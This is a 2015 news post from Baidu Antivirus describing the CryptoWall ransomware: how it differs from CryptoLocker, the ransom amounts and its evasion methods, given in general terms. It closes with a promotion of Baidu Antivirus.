News

New CryptoWall Ransomware Holds User Information Hostage

2015-07-02

Ransomware is a particularly heinous type of malware that abducts a user's files and personal data and holds them ransom, requesting hundreds to thousands of dollars to reclaim them. If the victims refuse to pay up within a set timeframe, the ransomware will keep their files locked up forever. Ransomware has been around for quite awhile, with the first such program having been sighted in the late 1980s. Unfortunately, cybercriminals have only gotten more tech savvy as the years have gone by. The most recently reported case of ransomware is a Trojan called “CryptoWall”, and it’s worse than ever before. 


CryptoWall is more or less an upgraded version of CryptoLocker, which first hit the scene in 2013. CryptoLocker originally worked by encrypting users’ files, then demanding that the victims pay USD $300 within 72 hours for a unique decryption key; otherwise, the key will be destroyed, and the users’ files will forever remain encrypted and inaccessible. CryptoWall differs from CryptoLocker in three important ways; first, it uses Tor in an attempt to hide its “command and control infrastructure” ; second, it disguises itself as an eBook using the Microsoft CHM file type extension. Thirdly and perhaps most nefariously, it demands much more ransom money from its victims. How much, you ask? Victims of CryptoWall have been requested to pay an unbelievable USD $10,000 in Bitcoin to get their files back. Cumulatively, CryptoWall victims have paid over USD $18 million in ransom over the past year alone.

 Figure 1. The CryptoWall 3.0 introductory screen.


By using the Microsoft CHM eBook format – a file type that appears harmless – users are quick to relax and let their guard down. They then download the malware through Microsoft powershell.exe, which effectively shields CryptoWall from detection by antivirus software. In addition to using Microsoft file formats and software to hide itself, this new ransomware uses various other means to evade security software scans. For example, it might save the virus on the well-known file sharing website MediaFire, or use a trusted digital signature to bypass detection by security software. 

Figure 2. CryptoWall uses recognized digital signatures to bypass detection.


To avoid the malicious encryption of your personal information and files, the Baidu Antivirus Security Center would like to remind users that they should install multi-functional security software and enable the real-time defense function so they will be protected from all kinds of online threats. Users already infected with malicious ransomware can use Baidu Antivirus 2015's Quick Scan feature for a security health check before removing any potentially dangerous programs. CryptoWall is not the only ransomware threat floating around on the Internet; the Baidu Antivirus Security Center previously reported on CTB Locker, and we would like to take this opportunity to remind all users to remain vigilant about that threat as well.

 

Figure 3. Baidu Antivirus 2015 successfully detects a ransomware threat.


Download Baidu Antivirus – the best free antivirus – here: Download


Sources: Spamfighter.com, Darkreading.com